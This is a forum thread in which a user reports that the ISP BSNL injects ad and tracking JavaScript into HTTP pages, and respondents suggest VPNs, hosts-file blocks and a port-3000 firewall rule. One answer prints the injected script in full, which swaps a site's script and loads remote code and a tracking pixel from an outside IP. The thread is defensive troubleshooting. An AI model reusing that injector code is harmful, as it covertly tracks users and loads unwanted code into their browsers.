I've recently been having a problem where my ISP (BSNL India) has been injecting ads and weird JavaScript tracking code into my browser, making websites unusable and unresponsive.

I've written an article regarding this too: https://www.nonstoptrend.com/bsnl-is-injecting-adsscripts-onto-your-browser-using-phozeca-2017/

You can read that to understand exactly what is happening and to see what the injected code is doing.

I'm sure this is my ISP because the domain starts with "bsnl.phozeca.com" and uses port 3000.

Points to note:

- Script injection works only on non-HTTPS sites, such as the Steam Store and other non-HTTPS websites.

- The code being injected uses port 3000.

- Websites which malfunction work normally when CSP (Content Security Policy) is disabled in the browser.

- Websites which malfunction work properly in Tor Browser.

- I personally have investigated this matter. After reading through the code (read my article to know what I'm talking about), I called the "loadnewads()" function from the code, and once it's called, weird ads come up, such as fake Flash Player ads and fake download buttons.

Things I have tried to solve this problem:

1) Checking the hosts file and blocking the domain: not working. The script is still being injected.

2) Scanning the PC for malware: not working. I've scanned with over three antiviruses, including Malwarebytes; still nothing is detected.

3) Disabling CSP (Content Security Policy): worked! However, ads automatically start playing.

4) Changing DNS to Google's DNS: not working.

Is there any way to solve this problem? Please help. Thanks!

  • Use a VPN, or set up an AWS instance in another country and tunnel all your traffic through it. #1, 2 and 4 wouldn't do anything because they're modifying your traffic in flight (hence why HTTPS is unaffected). If you hide your traffic in encrypted tunnels, they can't mess with it without breaking your connection. – Ivan Apr 21 '17 at 18:53
  • Using a VPN will affect my social media profiles. They'll end up getting locked because of usage from an unknown IP address. Also, I cannot register on a new forum/website with a VPN because the IP must have been used previously for registering. – HDG390x Apr 21 '17 at 18:56
  • What about using NoScript or some other script-blocking plugin that prevents third-party scripts from executing? – Ivan Apr 21 '17 at 18:58
  • Thanks for the suggestion, I will try it and let you know if it worked. The thing is, though, that the code injected by my ISP doesn't get executed because CSP is enabled; it still just shows up there out of nowhere. – HDG390x Apr 21 '17 at 19:00
  • They'll always be able to inject code into your unencrypted traffic. If you won't encrypt it, and you can't change ISPs, the best you can do is try to stop it from executing, so a NoScript + Adblock plugin combo is the best you can hope for. Port 3000 is probably just the remote socket that returns ads when the injected script calls home. – Ivan Apr 21 '17 at 19:08

First, try to get your ISP to stop doing it (if that is applicable).

As you mentioned, HTTPS cannot be compromised, which is how it should be, so use HTTPS wherever possible.

About your other attempts:

1) Checking hosts file and blocking the domain: Not working. The script is still being injected.

This must work; if it doesn't, you are doing it wrong. Another way is to block the same thing with your modem's or router's domain/IP block (or firewall).

If your ISP is smart enough, it will host the scripts under varying domain names, so blocking all of them will be hard for you.

2) Scanning the PC for malware

Won't work, of course.

3) Disabling CSP (Content Security Policy)

I have no clue what this is, but since HTTP comes with zero security, this CSP could be fooled and/or cannot tell whether content is not permitted (by what logic?).

4) Changed DNS to Google's DNS

Won't work, of course; the issue you have is post-DNS. Even if your ISP overrode the DNS resolution result, it's still simple to place the ad in HTTP.

100% working solutions
Use a VPN, or stunnel bound to a service like Squid behind it. This may not work if your ISP detects your connection to the target IP (either the VPN or stunnel) as part of its anti-ad policy.

50% working solutions
Block all of the content with your browser's adblock (or other) plugin.

I had a similar issue. I have a simple trick; it is temporary, but it is working for me and stopped the BSNL ISP from tracking and pushing malware ad popups. I added a hosts entry on my computer for bsnl.phozeca.com and pointed it to localhost.

  • The succinct point of your answer, Preetham, is a "blacklist" hosts file. Good answer and a very good solution to this sort of problem. It may or may not be temporary; it depends on the attacker and their persistence. Further reading here: someonewhocares.org/hosts and isc.sans.edu/forums/diary/Host+file+black+lists/6469 – 0xSheepdog May 10 '17 at 0:30
  • How did you manage to do it through your hosts file? I've tried doing the same, but it doesn't help. Can you please show me your hosts file so I can see exactly how you've done it? Thanks! – HDG390x May 11 '17 at 15:05
  • I use a MacBook, so the hosts file is /etc/hosts. It didn't work for me either until I cleared the DNS cache. I used the command dscacheutil -flushcache; I think for Windows it would be ipconfig /flushdns – Preetham Hegde May 13 '17 at 14:38
  • Hey, thanks for the reply. Although I added the entry to the hosts file and flushed the DNS, it didn't work. Somehow, miraculously, today when I tried to access the Steam Store, the ads stopped coming! The script stopped damaging the websites. – HDG390x May 14 '17 at 7:12
  • I am also facing the same issue after switching to the Connect ISP provider, and I just fixed it by following your suggestion to block it via a hosts entry: #Block adware from connect ##### 127.0.0.1 c.phozeca.com – shivgre Jul 22 '17 at 21:14

As Preetham suggested, adding more details.

  1. I downloaded the hosts file from http://winhelp2002.mvps.org/hosts.zip and replaced the one in this location: C:\Windows\System32\drivers\etc

  2. If you do not know how to replace the hosts file, you can follow these instructions: http://winhelp2002.mvps.org/hostswin8.htm

  3. To get rid of the popup from engine.spotscenered.info/link.engine?guid= I added the following entries to the hosts file:

    0.0.0.0 www.onclickmax.com
    0.0.0.0 bsnl.phozeca.com
    0.0.0.0 *.onclickmax.com
    0.0.0.0 phozeca.com
    0.0.0.0 c.phozeca.com

I do not see any popup ads... gone!

It looks like the malware has evolved.

It now uses an IP address and injects itself into the JS files of HTTP websites (I used a proxy for analysis).

For example, in the case of bbc.co.uk, when the browser requested the URL below:

http://static.bbc.co.uk/id/0.37.24/modules/idcta/statusbar.js

instead of the original script below:

define(["idcta/idCookie","idcta/id-config","idcta/apiUtils"],function(d,c,h){var b={};function e(j){try{this.id=null;this.element=null;this.ctaLink=null;this.ctaName=null;if(f(j)){this.id=j.id;this.element=document.getElementById(j.id);if(!j.blq){this.ctaLink=document.getElementById("idcta-link");this.ctaName=this.element.getElementsByTagName("span")[0]}else{this.ctaLink=document.getElementById(j["link-id"])?document.getElementById(j["link-id"]):this.element.getElementsByTagName("a")[0];this.ctaName=j["name-id"]?document.getElementById(j["name-id"]):this.element.getElementsByTagName("span")[1]}var i=this;if(j.publiclyCacheable===true){if(d.getInstance().hasCookie()){if(c.status_url&&i.ctaLink.href!==c.status_url){i.ctaLink.href=c.status_url}a(i,d.getInstance())}else{if(c.signin_url){i.ctaLink.href=c.signin_url}i.ctaName.innerHTML=c.translation_signedout}}}}catch(k){h.logCaughtError(k)}}function a(m,k){try{var j=k.getNameFromCookie()||c.translation_signedin;var i=c.translation_signedin;if(j){i=g(j,14)}m.element.className=m.element.className+" idcta-signedin";m.ctaName.innerHTML=i}catch(l){h.logCaughtError(l)}}function g(j,i){if(j.length>i){return j.substring(0,i-1)+"…"}return j}function f(i){if(!document.getElementById(i.id)){return false}if(!i.blq&&!document.getElementById("idcta-link")){return false}if(i.blq&&!document.getElementById(i["link-id"])){return false}return true}b.Statusbar=e;b.updateForAuthorisedState=a;return b});

the malware (ISP-end?) injected the malicious JS script below:

!function(){var a="/id/0.37.24/modules/idcta/statusbar.js",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)
if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}
void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}
var a1="117.254.84.212";var a2="3000";if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l=a1+":"+a2+"/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fid%2F0.37.24%2Fmodules%2Fidcta%2Fstatusbar.js%22%2C%22referer%22:%22http:%2F%2Fwww.bbc.com%2F%22%2C%22host%22:%22static.bbc.co.uk%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}
var imgtag=document.createElement('img');imgtag.height='1';imgtag.width='1';imgtag.style='border-style:none;';imgtag.alt='';imgtag.src='//'+a1+":"+a2+"/pixel/1x1.png"}catch(a){}}()

The fix that worked was to add a firewall rule blocking port 3000 across BSNL's range, 117.192.0.0 to 117.255.255.255 (based on UltraDNS's information).

I did this both at the system level and at the ADSL router level (since mobile devices using the network are affected as well).

Hopefully this will minimize conflicts with other applications that use port 3000.

For Windows, a video on blocking a port can be found here: https://www.youtube.com/watch?v=KA8BIshUcXw

Regards

Ravindra
